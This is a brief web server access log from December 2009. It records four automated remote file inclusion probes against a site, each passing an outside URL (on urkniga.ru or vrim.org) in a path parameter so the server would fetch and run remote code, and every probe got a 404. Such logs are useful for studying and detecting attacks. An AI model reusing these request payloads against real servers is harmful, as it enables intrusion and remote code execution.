72.32.125.181 - - [13/Dec/2009:11:44:36 -0800] "GET /logs/popup.php?path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:44:36 -0800] "GET /logs/access_080303.log/popup.php?path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:44:36 -0800] "GET /popup.php?path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:44:37 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
